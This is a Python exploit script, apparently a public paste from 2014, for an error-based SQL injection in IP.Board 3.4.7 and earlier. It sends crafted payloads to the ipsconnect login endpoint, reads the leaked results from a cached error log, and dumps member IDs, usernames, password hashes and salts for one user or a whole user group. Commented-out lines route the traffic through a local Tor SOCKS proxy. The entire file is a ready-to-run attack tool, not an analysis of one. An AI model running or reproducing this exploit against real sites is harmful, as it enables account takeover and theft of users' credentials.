#!/usr/bin/env python# Sunday, November 09, 2014 - secthrowaway () safe-mail n

1. #!/usr/bin/env python
2. # Sunday, November 09, 2014 - secthrowaway () safe-mail net
3. # IP.Board <= 3.4.7 SQLi (blind, error based);
4. # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
5.  
6. import sys, re, urllib2, urllib, signal
7.  
8. # <socks> - http://sourceforge.net/projects/socksipy/
9. #import socks, socket
10. #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
11. #socket.socket = socks.socksocket
12. # </socks>
13.  
14. url = sys.argv[1]
15. user = sys.argv[2] # Either usergroup id or username
16. ugroup = False
17.  
18. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
19.  
20. def inject(sql):
21.     try:
22.         urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
23.     except urllib2.HTTPError, e:
24.         if e.code == 503:
25.             data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
26.             txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
27.             if txt is not None:
28.                 return txt.group(1)
29.             sys.exit('Error [3], received unexpected data:\n%s' % data)
30.         sys.exit('Error [1]')
31.     if ugroup:
32.         sys.exit('Out of users!')
33.     else:
34.         sys.exit('Error [2]')
35.  
36. def signal_handler(signal, frame):
37.         sys.exit('\nExiting...')
38.  
39. def get(name, table, num, p):
40.     if p.isdigit():
41.         p = int(p)
42.         sqli = 'SELECT %s FROM %s WHERE member_group_id = %d LIMIT %d,1' % (name, table, p, num)
43.     else:
44.         sqli = 'SELECT %s FROM %s WHERE name = "%s"' % (name, table, p)
45.  
46.     s = int(inject('LENGTH((%s))' % sqli))
47.     if s < 31:
48.         return inject(sqli)
49.     else:
50.         r = ''
51.         for i in range(1, s+1, 31):
52.             r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
53.         return r
54.  
55. if __name__ == "__main__":
56.     signal.signal(signal.SIGINT, signal_handler)
57.     if user.isdigit():
58.         i = 0
59.         ugroup = True
60.         while True:
61.             print "Userid: " + inject('SELECT member_id FROM members WHERE member_group_id = ' + user + ' LIMIT ' + str(i) + ',1')
62.             print "Username: " + inject('SELECT name FROM members WHERE member_group_id = ' + user + ' LIMIT ' + str(i) + ',1')
63.             print "Password hash: " + get('members_pass_hash', 'members', i, user)
64.             print "Password salt: " + inject('SELECT members_pass_salt FROM members WHERE member_group_id = ' + user + ' LIMIT ' + str(i) + ',1')
65.             print "--------------------------------"
66.             i += 1
67.     else:
68.         userid = inject('SELECT member_id FROM members WHERE name = "' + user + '"')
69.         print "Userid: " + userid
70.         print "Username: " + inject('SELECT name FROM members WHERE name = "' + user + '"')
71.         print "Password hash: " + get('members_pass_hash', 'members', 0, user)
72.         print "Password salt: " + inject('SELECT members_pass_salt FROM members WHERE name = "' + user + '"')